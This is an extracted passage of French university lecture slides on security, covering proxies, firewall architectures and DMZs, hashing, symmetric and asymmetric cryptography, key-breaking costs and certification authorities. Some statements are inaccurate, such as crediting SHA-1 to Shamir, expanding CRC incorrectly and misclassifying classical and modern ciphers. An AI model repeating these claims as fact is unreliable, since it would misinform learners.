LentTous les protocoles ne passent pasNe comprend pas la communicationNécessite l’installation d’une partie cliente

Intégrée dans les outilsIntégrée dans le système par des librairies

Empêche la notion de serveur

[email protected] Sécurité Informatique/ March 31, 2018 207 / 381

Page 208: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais circuit : Trucs

Différencier relais d’entrée et relais de sortieLes relais de sortie doivent refuser l’entréePréférer les relais applicatifs si possible

[email protected] Sécurité Informatique/ March 31, 2018 208 / 381

Page 209: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais circuit : Options courantes

Chiffrement entre le client et le relaisAuthentificationTunneling

[email protected] Sécurité Informatique/ March 31, 2018 209 / 381

Page 210: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais circuit : Exemples

Un seul exemple définit par une RFC (dite AFT advancedFirewall Traversal)

Les socksPlusieurs implémentations (dont certaines gratuites)

Nec (serveur et client)Hummingbird (client)Dante (serveur et client unix)Msproxy (en partie)

[email protected] Sécurité Informatique/ March 31, 2018 210 / 381

Page 211: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les relais applicatifs

Les relais applicatifs

[email protected] Sécurité Informatique/ March 31, 2018 211 / 381

Page 212: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais applicatifs : Définition

Le client fait une demande de connexion au relais dans lemême protocoleLe relais traite la demande et la retransmet au serveurIl renvoie la réponse au clientLa communication C-R est conforme au protocole relayéR comprend la communicationR peut intervenir dans la communication

Squid : accélération, transforme les urls, etc.Sendmail/Postfix : ajoutent des entêtes

[email protected] Sécurité Informatique/ March 31, 2018 212 / 381

Page 213: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais applicatifs : Avantages

Compréhension totale du protocoleFiltrage extrêmement finJournalisation complèteProtection plus efficace

Authentification facilement intégrableNombreuses fonctionnalités complémentairesParfois seul moyen de passer (X11)Utilisés en relais d’entrée, ils protègent efficacement lesserveurs

[email protected] Sécurité Informatique/ March 31, 2018 213 / 381

Page 214: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais applicatifs : Inconvénients

Il faut un relais par protocoleIl y a peu de protocoles relayésC’est le plus lent des relaisConsommateur de CPUPlus complexe, et donc plus vulnérableChaque logiciel doit-être configuré (sauf si redirectiontransparente)

[email protected] Sécurité Informatique/ March 31, 2018 214 / 381

Page 215: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais applicatifs : options courantes

Lutte antiviraleFiltrage d’action (put, get pour le ftp)Filtrage d’URLsCache (optimisation du trafic)Authentification

[email protected] Sécurité Informatique/ March 31, 2018 215 / 381

Page 216: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais applicatifs : Trucs

Penser à empêcher l’entrée par leur biaisAttention aux modules génériques qui n’ont pas les avantagesdes relais applicatifs (voir relais circuit)Ne pas croire qu’ils sont la panacée !! (httptunnel)

[email protected] Sécurité Informatique/ March 31, 2018 216 / 381

Page 217: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais applicatifs : Exemples

Squid (http, https, ftp)Fwtk (http, ftp, telnet, X11, rlogin, pop, sqlnet générique(TCP)). Mais ne bouge plus depuis plusieurs années.Serveurs SMTP, DNS, NTP (par définition)

[email protected] Sécurité Informatique/ March 31, 2018 217 / 381

Page 218: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais applicatifs : Exercice

Installation d’un relais Squid + SquidGuardApt-get install squidApt-get install squidGuardApt-get install chastity-listSquid.conf (url_rewrite_program /usr/bin/squidGuard -c/etc/chastity/squidGuard-chastity.conf)

[email protected] Sécurité Informatique/ March 31, 2018 218 / 381

Page 219: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le mélange des genres

Complémentarité visibleQuelques pare-feu intègrent 2 processus

Filtrage stateful qui renvoie versdes Relais applicatifs transparents

[email protected] Sécurité Informatique/ March 31, 2018 219 / 381

Page 220: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Choix entre ces 4 (5) types

DépendDe la sécurité exigéeDe la vitesse nécessaireDu budget disponibleDes exigences des utilisateurs

Rarement limité à un seul typeIls sont très complémentaires.Les relais ne sont rien sans des interdictions

[email protected] Sécurité Informatique/ March 31, 2018 220 / 381

Page 221: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les astuces générales

Utiliser un serveur Syslog centraliséSynchroniser les horloges par NTPBien segmenter son réseau (règles simples)Eviter de nuire aux utilisateurs !!!!

[email protected] Sécurité Informatique/ March 31, 2018 221 / 381

Page 222: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu : le faire soi-même

Choisir un OS bien maîtriséNe PAS ENCORE LE CONNECTERPartitionner correctement le disque (/var)Patcher l’OS et les logicielsPas de compte utilisateurEnlever les services non indispensablesFaire une synchronisation NTP du PF

[email protected] Sécurité Informatique/ March 31, 2018 222 / 381

Page 223: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu : le faire soi-même : mode paranoiaque

Limitez les logicielschroot et chuid des processus (UNIX)Un uid par processus

Application de patch noyaux durcisgrsecurity http://www.grsecurity.netopenwall http://www.openwall.comSelinux

[email protected] Sécurité Informatique/ March 31, 2018 223 / 381

Page 224: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu : le faire soi-même : mode paranoiaque

Mettre ce qui possible en immuablechmod +t en unixmonter les partitions en Read Only

Faire une empreinte du systèmeTripwire http://www.tripwire.org

[email protected] Sécurité Informatique/ March 31, 2018 224 / 381

Page 225: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les architectures

Les architectures

[email protected] Sécurité Informatique/ March 31, 2018 225 / 381

Page 226: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les architectures disponibles

Leur fonctionnement dépend des pare-feux utilisésLes architectures dépendent

Du budgetDu temps disponibleDes compétences localesDes choix de la politique de sécurité

[email protected] Sécurité Informatique/ March 31, 2018 226 / 381

Page 227: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Bastion externe

Réseau extérieur

Pare-feu

Ressources privées

Ressources publiques

Zone dangereuse

Zone semi-protégée

Zone protégée

[email protected] Sécurité Informatique/ March 31, 2018 227 / 381

Page 228: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Bastion externe

Les plusProtège tout le réseauL’accès aux serveurs publics est rapide

Les moinsSi le serveur public est compromis ....Si le PF est compromis ....

[email protected] Sécurité Informatique/ March 31, 2018 228 / 381

Page 229: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Bastion interne

[email protected] Sécurité Informatique/ March 31, 2018 229 / 381

Page 230: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Bastion interne

Les plusSi les serveurs publics compromis => PF

Les moinsLes serveurs publics sont moins accessiblesSi le PF est compromis ....

[email protected] Sécurité Informatique/ March 31, 2018 230 / 381

Page 231: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

DMZ ou Zone Semi-Ouverte

[email protected] Sécurité Informatique/ March 31, 2018 231 / 381

Page 232: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

DMZ

Les plusTout le réseau est protégéSi serveurs publics compromis => PF2Si PF1 compromis => PF2

Les moinsLes serveurs publics sont moins accessibles (sauf si PF2filtrant)

[email protected] Sécurité Informatique/ March 31, 2018 232 / 381

Page 233: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

DMZ : PF à interfaces multiples

[email protected] Sécurité Informatique/ March 31, 2018 233 / 381

Page 234: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

DMZ : PF à interfaces multiples

Les plusMoins cherPlus facile à administrerMême technologie pour toutes les DMZ

Les moinsSi PF compromis ...Règles plus complexes

[email protected] Sécurité Informatique/ March 31, 2018 234 / 381

Page 235: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

DMZ : compléments

Combien de DMZ ?1 pour les serveurs publics1 pour les entrées1 pour les sorties....

[email protected] Sécurité Informatique/ March 31, 2018 235 / 381

Page 236: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Architecture : choix à effectuer

Quels sont les types de PF utilisés ?Les clients internes sortent-ils directement ?

Plus souple, plus rapide, moins sûrLes clients sont-ils obligés de "relayer" ?

Plus sûr, moins rapide, moins souple

[email protected] Sécurité Informatique/ March 31, 2018 236 / 381

Page 237: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Architecture : trucs

Mettre un serveur syslog à l’intérieurEmpêcher le DNS de résoudre les adresses IP internes pourl’extérieurLes serveurs publics sont des semi-copies de serveurs internes

LDAP, Web, etc..

[email protected] Sécurité Informatique/ March 31, 2018 237 / 381

Page 238: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Critères de choix

Pas de "meilleur" pare-feu, uniquement un plus adapté que lesautres.Position dans l’organisme (en entrée, devant un laboratoire)Hiérarchie des priorités

VitesseProtection entranteProtection sortante

[email protected] Sécurité Informatique/ March 31, 2018 238 / 381

Page 239: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Définir ses besoins :Quel trafic ?

Faire une analyse de traficMettre un NIDS

Analyser les attaquesPermet de justifier des budgets (surtout s’il y a de beauxgraphiques)

[email protected] Sécurité Informatique/ March 31, 2018 239 / 381

Page 240: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Vérifier son pare-feu

NMAPServices visibles par un pirate

FilterrulesAnalyse des filtres réellement en place

NIDS après le PFVérifie que rien ne passe.

[email protected] Sécurité Informatique/ March 31, 2018 240 / 381

Page 241: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Gérer son pare-feu

ConfigurerInterface graphique ?Console ?

A distance ?Console d’administration centralePar telnet ou ssh

Sur la console ?

[email protected] Sécurité Informatique/ March 31, 2018 241 / 381

Page 242: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu : l’arme absolue ?

Avez-vous vu passer NIMDA ?Compléments indispensables

IDS et NIDSAnti-VirusSuivre l’actualité sécuritaire

Problèmes de légalité

[email protected] Sécurité Informatique/ March 31, 2018 242 / 381

Page 243: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le chiffrement

Le Chiffrement

[email protected] Sécurité Informatique/ March 31, 2018 243 / 381

Page 244: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le chiffrement

Les condensats (Hash)La signatureLe chiffrement symétriqueLe chiffrement asymétriqueLes certificats

[email protected] Sécurité Informatique/ March 31, 2018 244 / 381

Page 245: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Hashage : définition

Transformation d’une suite d’octets de longueur généralementquelconque en une suite de longueur finie,Souvent appelé "condensat",Génère une "empreinte" pseudo-unique,Cette opération est constante (même fichier, même hash),Cette opération est non réversible.

[email protected] Sécurité Informatique/ March 31, 2018 245 / 381

Page 246: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Hashage : utilité

Le "Hash" est utilisé pour garantir l’intégrité des donnéesIl permet de vérifier l’égalité d’un mot de passe, sans enconserver l’originalUne petite modification du fichier original donne une grandevariation du Hash (généralement)

[email protected] Sécurité Informatique/ March 31, 2018 246 / 381

Page 247: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Exemples de Hashage

Le crypt unix"password" → "5GKtdsqlkgy"

Le CRC (Compute Redondancy Check)le sum unix

SHA-1 (Shamir)MD5 (Rivest)

[email protected] Sécurité Informatique/ March 31, 2018 247 / 381

Page 248: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Hash de mot de passe : bcrypt et argon2

à réserver aux de mots de passe : ils sont très longsmême les mots de passe "simples" deviennent coûteux àcasser.bcrypt

c’est le standard actuelbasé sur blowfish

argon2a gagné le concours 2015 du meilleur algo de hash de mot depasse2 versions : l’une résiste mieux au GPU, l’autre aux"side-channels".

[email protected] Sécurité Informatique/ March 31, 2018 248 / 381

Page 249: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Hashage : utilisation pour les mots de passe

Génération :Alice choisit son mot de passe M1Le système "hashe" M1 pour obtenir HASH1Le système ne conserve que HASH1

UtilisationAlice se reconnecte, en tapant le mot de passe M2(normalement identique à M1)Le système hashe M2 et obtient HASH2Si HASH2=HASH1 alors M2=M1, donc OKOption : on peut ajouter un "sel" pour complexifier lecraquage des mots de passe.

[email protected] Sécurité Informatique/ March 31, 2018 249 / 381

Page 250: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Vocabulaire

Coder : rendre inintelligible une information à l’aide d’un codeDécoder : rendre intelligible une information préalablementcodée à l’aide de la cléDécrypter : décoder mais sans le codeChiffrer=coderCrypter : en théorie n’existe pas

Pour plus d’information:http://michel.arboi.free.fr/cryptFAQ/

[email protected] Sécurité Informatique/ March 31, 2018 250 / 381

Page 251: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pièges du chiffrement

Un chiffrement sans clé est un mauvais chiffrementUn chiffrement "fermé" est un mauvais chiffrementFaire un bon chiffremernt est compliquéUn bon chiffrement "théorique", s’il est mal appliqué devientun mauvais code (exemple du chiffrement WEP pour le Wi-Fi)Réutiliser une clé fragilise plus ou moins le processus dechiffrement.

[email protected] Sécurité Informatique/ March 31, 2018 251 / 381

Page 252: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement symétrique

Les clés de chiffrement et de déchiffrement sont identiquesLes algorithmes de chiffrement et déchiffrement ne sont pasforcément identiques.Pour communiquer il faut que Alice et Bob soient tous les 2 aucourant de la clé, ce qui signifie un échange préalable

[email protected] Sécurité Informatique/ March 31, 2018 252 / 381

Page 253: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement symétrique

Alice

Bob

Cléde

Chiffrement

Algorithmede

chiffrementAlgorithme

dedéchiffrement

Message chiffréMessage

Message

[email protected] Sécurité Informatique/ March 31, 2018 253 / 381

Page 254: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement symétrique : exemples

Exemples à transpositionCode de VigenèreXOR

Exemples à permutationDES (64 bits), et triple DES (3DES)IDEAAES (actuel standard de l’armée US)

[email protected] Sécurité Informatique/ March 31, 2018 254 / 381

Page 255: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement symétrique : caractéristiques

Les chiffrements et déchiffrements sont rapidesLeur décryptage peut être très long

64 bits = 8 octets = 1,8 x 1019 possibilitésà 1 million de tests par seconde1,8 x 1013 secondes soit 5800 siècles

AES est disponible en version 128,192 et 256 bits

[email protected] Sécurité Informatique/ March 31, 2018 255 / 381

Page 256: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement symétrique : DES

Ancien standard56 bits (64 - 8 réservés à la parité)version renforcée : le triple DES, mais à 2 clés. Efficacité de113 bitsBloc de permutation de 64 bits

[email protected] Sécurité Informatique/ March 31, 2018 256 / 381

Page 257: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement symétrique : AES

http://www.securiteinfo.com/crypto/aes.shtml

Nouveau standard (il s’appellait Rijndael à l’origine après unconcours de la NSA)Auteurs Rijmen et DaemenPlusieurs versions de 128,192 ou 256 bitsPlus rapide que DES (il ne travaille qu’avec des entiers)

[email protected] Sécurité Informatique/ March 31, 2018 257 / 381

Page 258: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique

On génère 2 clés inter-dépendantes appeléesclé publique (qui a vocation à être largement distribuée)clé privée (qui doit absolument être protégée)

Ce qui est chiffrée par l’une est déchiffrable par l’autre, etuniquement elle !Il est mathématiquement impossible, dans des temps"humains" de déduire une clé depuis l’autre.

[email protected] Sécurité Informatique/ March 31, 2018 258 / 381

Page 259: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique

Bob

Alice

Message chiffré

Algorithmede

déchiffrement

Publicationsur Internet

Clé publiquede Bob

Générationdu bi-clé

Clé privéede Bob

Clé publiquede Bob

Message

Algorithmede

chiffrementMessage

[email protected] Sécurité Informatique/ March 31, 2018 259 / 381

Page 260: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : avantages

La clé publique est ... publiqueOn peut signer les messages avec ce chiffrement (cf la suite)

[email protected] Sécurité Informatique/ March 31, 2018 260 / 381

Page 261: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : inconvénients

Le chiffrement est moins résistant (2048 bits RSA = 128 bitsAES),Il est plus sensible aux progrès mathématiques,Il est beaucoup plus lent (puissance CPU occupée de 50 à 100fois plus importante)

[email protected] Sécurité Informatique/ March 31, 2018 261 / 381

Page 262: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : exemples

MéthodesR.S.A.Diffie HelmannEl Gamal (logarithme discret)Courbes elliptiques

OutilsPGPGPGOpenssl

[email protected] Sécurité Informatique/ March 31, 2018 262 / 381

Page 263: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : PGP

Pretty Good PrivacyAuteur : Phil R. ZimmermannBasé sur RSANotion d’anneau de confianceA l’origine du standard OpenPGP (RFC 2440)

[email protected] Sécurité Informatique/ March 31, 2018 263 / 381

Page 264: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : GPG

GNU Privacy GuardLogiciel libreCompatible avec PGPhttp://www.hsc/ressources/breves/gpg.html

[email protected] Sécurité Informatique/ March 31, 2018 264 / 381

Page 265: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : RSA

Auteurs : Rivest, Shamir et AdelmanBasé sur la factorisation de nombres premiersLe plus connu des chiffrements asymétriques

[email protected] Sécurité Informatique/ March 31, 2018 265 / 381

Page 266: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement : réalité

Chiffrement asymétrique est lent, et le chiffrement symétriqueinutilisableD’où l’idée

On échange des clés de session symétriques en les codant avecun chiffrement asymétriquePuis on décode en symétrique

[email protected] Sécurité Informatique/ March 31, 2018 266 / 381

Page 267: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Cassage de clé : en 1995

Qui budget Moyen Temps Coût Clé sûreHacker de passage 0,00 € ordinateur 1 semaine 45Hacker de passage 400,00 € FPGA 5 heures 8 cents 50Petite entreprise 10.000,00 € FPGA 12 minutes 55Service moyen 300.000,00 € FPGA 24 secondes 60Grosse entreprise 10.000.000,00 € FPGA 0,7s 65Grosse entreprise 10.000.000,00 € ASIC 5 ms 0,1 cents 70NSA,DCRI,GRU 300.000.000,00 € ASIC 0,2ms 0,1 cents 75

[email protected] Sécurité Informatique/ March 31, 2018 267 / 381

Page 268: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Cassage de code : décryptage

La puissance processeur double tous les 18 mois (loi de Moore)Progrès mathématiques sur les chiffrements asymétriques :rapidité doublée tous les 18 mois avec des sauts sporadiquesBudget d’un attaquant double tous les 10 ansActuellement (http://hashcat.net) pour une AMD 7970(150 €)

8,5 milliards de MD5 par seconde416 Millions de SHA512 par seconde179 Millions de SHA-3 par seconde141000 WPA2 par seconde

[email protected] Sécurité Informatique/ March 31, 2018 268 / 381

Page 269: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Cassage de clé : évolution

La vision en 2001 :

1982 1992 2002 2012 2022 2032symétrique 56 64 72 80 87 95RSA/log discret 417 682 1028 1464 1995 2629DSS 102 114 127 141 154 168Courbes elliptiques 135 149 164 179

La recommandation actuelle en 2017 du BSI (Allemand)128 bits pour du symétrique2000 bits pour du RSA250 bits pour de l’elliptique et de l’algorithme discret

Référence : EPFL 2001Référence : keylength

[email protected] Sécurité Informatique/ March 31, 2018 269 / 381

Page 270: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : Signature

La signature est la garantiede l’identité de l’expéditeur du messagede l’intégrité du message

La procédureOn prend l’empreinte du messageOn la code avec sa clé privéeOn l’expédieLe destinataire décode l’empreinte avec la clé publique etcompare les 2 empreintes

[email protected] Sécurité Informatique/ March 31, 2018 270 / 381

Page 271: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Chiffrement asymétrique : Signature

BobAlice

Message

Message

Algo Hash

Algo Chiffrement

Hash Codé

Message

Clé privéede Bob

Algorithmede

chiffrement

Hash

Hash chiffré

Algorithmede

hashage

Clé publiquede Bob

Algorithmede

déchiffrement

Hash

Comparaison

Hash codé

Hash déchiffré

Algorithmede

hashage

[email protected] Sécurité Informatique/ March 31, 2018 271 / 381

Page 272: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification

A qui appartient la clé publique ?Possibilité d’usurpation d’identité

UtilisateurMachine

Problème de confianceNotion de tiers de confianceNotion d’autorité de certification

[email protected] Sécurité Informatique/ March 31, 2018 272 / 381

Page 273: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification : création

Une "autorité de certification" est désignée "d’un communaccord" par sa communautéElle génère son bi-clé (couple clé publique/clé privée)Elle génère un certificat auto-signéLe certificat est délivré à chaque membre de la communauté.Les membres l’intègrent dans les navigateurs.

[email protected] Sécurité Informatique/ March 31, 2018 273 / 381

Page 274: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification : création

Verisign

Clé publiquede Verisign

Clé Publiquede Verisign

Certificateur : Verisign

Objet : Verisign

Chiffrement : RSA

Hashage : MD5

Hash Codé

Clé privéede Verisign

chiffrement RSA

Hash

Hash chiffré

hashage MD5

[email protected] Sécurité Informatique/ March 31, 2018 274 / 381

Page 275: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification : certification

Un membre de la communauté crée son bi-cléIl va auprès de l’Autorité d’enregistrement se faire reconnaîtreet valider son certificat.L’AE envoie la signature à l’ACL’AC signe avec sa clé privée le certificat.Le membre récupère le certificat et l’intègre dans son serveur.

[email protected] Sécurité Informatique/ March 31, 2018 275 / 381

